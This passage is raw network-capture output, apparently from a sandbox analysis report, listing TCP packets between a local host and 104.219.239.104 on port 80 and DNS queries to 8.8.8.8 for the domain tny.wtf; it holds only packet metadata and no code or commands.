                        Jul 26, 2024 13:40:28.370878935 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.370924950 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.371599913 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.371618986 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.371649027 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.371690989 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.371772051 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.372342110 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.372359991 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.372447014 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.373075008 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.373094082 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.373148918 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.373817921 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.373836994 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.373893976 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.374521017 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.374538898 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.374594927 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.375200987 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.375221014 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.375252008 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.375283003 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.375364065 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.375866890 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.375886917 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.375947952 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.376553059 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.376570940 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.376621008 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.377233982 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.377253056 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.547200918 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.547219038 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.547246933 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.547262907 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.547266960 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.547266960 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.547280073 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.547312021 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.547398090 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.547398090 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.548125029 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548141956 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548173904 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548190117 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548197031 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.548206091 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548223019 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548441887 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.548441887 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.548916101 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548933029 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548964977 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548980951 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.548998117 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.549031019 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.549043894 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.549043894 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.549045086 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.549182892 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.549765110 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.549782038 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.549813986 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.549829960 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.549845934 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.549877882 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.549900055 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.549900055 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.549900055 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.550018072 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.550548077 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.550674915 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.550692081 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.550724030 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.550740957 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.550772905 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.550790071 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.550801992 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.550817013 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.550817013 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.550817013 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.550946951 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.620966911 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.620996952 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621035099 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621197939 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621217012 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621251106 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621268988 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621284008 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.621284008 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.621284008 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.621462107 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.621684074 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621722937 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621757030 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621773005 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621792078 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.621824026 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.621824026 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.621929884 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.622447014 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.622466087 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.622519016 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.622693062 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.622709990 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.622741938 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.622760057 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.622776985 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.622793913 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.622828007 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.622828007 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.622934103 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.623599052 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.623616934 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.623667002 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.623684883 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.623718023 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.623734951 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.623750925 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.623758078 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.623758078 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.623758078 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.623769045 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.623881102 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.623881102 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.624663115 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.624680996 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.624712944 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.624730110 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.624763012 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.624779940 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.624823093 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.624823093 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.624823093 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.625646114 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.625665903 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.625696898 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.625715017 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.625730038 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.625746965 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.625762939 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.625809908 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.625809908 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.625809908 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.626667023 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.626686096 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.626718044 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.626735926 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.626751900 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.626769066 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.626795053 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.626796007 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.626796007 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.626808882 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.627604961 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.627624035 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.627656937 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.627674103 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.627691031 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.627706051 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.627706051 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.627706051 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.627710104 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.627727032 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.628031015 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.628595114 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.628612995 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.628645897 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.628663063 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.628679037 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.628696918 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.628726006 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.628726006 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.628726006 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.629398108 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.629415989 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.629447937 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.629466057 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.629481077 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.629498005 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.629513979 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.629545927 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.629560947 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.629560947 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.629560947 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.629689932 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.630356073 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.630373955 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.630404949 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.630423069 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.630438089 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.630455017 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.630470037 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.630484104 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.630484104 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.630484104 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.630487919 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.630503893 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.630631924 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.631295919 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.631314993 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.631347895 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.631365061 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.631397009 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.631414890 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.631429911 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.631439924 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.631439924 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.631439924 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.631464005 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.631577969 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.631654024 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.632206917 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.632225037 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.632256985 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.632273912 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.632289886 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.632306099 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.632307053 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.632307053 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.632322073 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.632428885 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.632428885 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.632961988 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.632997036 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.633050919 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.633050919 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.633076906 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.633095026 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.633110046 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.633131027 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.633145094 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.633161068 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.633188009 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.633188009 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.633188009 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.633390903 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.634077072 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.634110928 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.634128094 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.634144068 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.634160042 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.634166002 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.634166002 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.634176016 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.634212971 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.634229898 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.634246111 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.634277105 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.634277105 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.634277105 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.707464933 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.707509041 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.707525015 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.707544088 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.707561016 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.707561016 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.707592964 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.707617998 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.707660913 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.707660913 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.707660913 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.708085060 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.708117962 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.708151102 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.708163023 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.708163023 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.708168983 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.708194017 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.708211899 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.708219051 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.708219051 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.708508968 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.708738089 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.708756924 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.708813906 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.708976984 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709009886 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709028006 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709043980 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709079981 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709089041 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.709089041 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.709089041 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.709096909 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709135056 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709148884 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709192991 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.709192991 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.709908009 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709940910 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709959030 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709975004 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709990978 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710007906 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710021019 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710021019 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710021019 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710024118 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710041046 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710813999 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710832119 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710864067 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710880995 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710891008 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710891008 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710897923 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710922003 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710937977 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710974932 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710974932 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710974932 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.711822987 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711832047 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711842060 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711847067 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711852074 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711858034 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711867094 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711873055 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711878061 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711911917 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.711911917 CEST4916680192.168.2.22104.219.239.104
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jul 26, 2024 13:40:18.519270897 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
                        Jul 26, 2024 13:40:18.532171965 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
                        Jul 26, 2024 13:40:20.662591934 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                        Jul 26, 2024 13:40:20.676371098 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                        Jul 26, 2024 13:40:22.393549919 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                        Jul 26, 2024 13:40:22.407102108 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
                        Jul 26, 2024 13:40:22.408610106 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
                        Jul 26, 2024 13:40:22.415918112 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
                        Jul 26, 2024 13:40:26.216869116 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
                        Jul 26, 2024 13:40:26.236521959 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
                        Jul 26, 2024 13:40:26.237873077 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
                        Jul 26, 2024 13:40:26.246084929 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Jul 26, 2024 13:40:18.519270897 CEST | 192.168.2.22 | 8.8.8.8 | 0x5750 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:20.662591934 CEST | 192.168.2.22 | 8.8.8.8 | 0x24b1 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:22.393549919 CEST | 192.168.2.22 | 8.8.8.8 | 0x7764 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
